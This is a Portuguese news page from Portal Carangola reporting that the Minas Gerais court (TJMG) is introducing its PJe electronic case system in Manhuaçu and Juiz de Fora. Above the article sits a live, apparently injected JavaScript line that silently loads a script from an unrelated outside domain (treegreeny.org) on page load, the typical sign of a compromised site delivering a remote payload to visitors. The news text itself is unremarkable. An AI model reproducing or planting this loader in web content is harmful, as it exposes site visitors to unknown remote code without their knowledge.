;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Processo eletrônico é implantado em Manhuaçu. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Processo eletrônico é implantado em Manhuaçu.

xPJE-LogoA partir da próxima segunda-feira, 3 de agosto, a tramitação processual, desde a petição inicial à publicação de despachos e sentenças, será realizada em meio eletrônico nas comarcas de Juiz de Fora e Manhuaçu. Trata-se da implantação do sistema PJe-CNJ 1ª Instância, que, até o primeiro semestre de 2016, informatizará toda a movimentação processual nas comarcas de entrância especial do Tribunal de Justiça de Minas Gerais (TJMG).

Em Manhuaçu o PJe-CNJ 1ª Instância será implantado nas 1ª e 2ª Varas Cíveis, na 2ª Vara Criminal, de Execuções Penais e de Cartas Precatórias Cíveis, na 1ª Vara Criminal, da Infância e da Juventude e de Execuções Fiscais.

O juiz diretor da comarca de Manhuaçu, Vinícius Dias Paes Ristor, disse que a expectativa quanto aos bons resultados do processo eletrônico é grande. Para ele, o PJe-CNJ 1ª Instância vai permitir a condução mais ágil do processo, o que vai resultar em uma maior produtividade do Poder Judiciário.

Outro fator considerado como positivo pelo juiz é a possibilidade de, a partir de uma análise com base no caminho do processo em um sistema eletrônico, os gestores formularem estratégias mais próximas da realidade.

Processo eletrônico

O Processo Judicial eletrônico (PJe-CNJ 1ª Instância) adotado pelo TJMG pode ser definido como um sistema informatizado que reproduz todo o procedimento judicial em meio eletrônico, substituindo o registro dos atos processuais no papel por armazenamento e manipulação dos autos em meio digital.

No TJMG, o processo eletrônico foi implantado em setembro de 2012 como projeto-piloto nas Varas Regionais do Barreiro, em Belo Horizonte, e está sendo estendido gradativamente para a Justiça Comum de Primeira Instância, conforme cronograma definido pela Presidência.

O processo eletrônico para a tramitação de todas as ações, com exceção para as de competência criminal já foi implantado nas comarcas de Betim, Contagem, Ibirité, Santa Luzia, Ribeirão das Neves, Vespasiano, Conselheiro Lafaiete, Sete Lagoas, Ubá, Barbacena e São João del Rei. As próximas comarcas a contarem com o processo eletrônico são Divinópolis e Montes Claros.

A implantação do PJe-CNJ 1ª Instância está inserida entre as iniciativas estratégicas do TJMG para 2015.

Assessoria de Comunicação Institucional – Ascom TJMG – Unidade Goiás
(31) 3237-1887
imprensa@tjmg.jus.br
facebook.com/TribunaldeJusticaMGoficial
twitter.com/tjmg_oficial

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.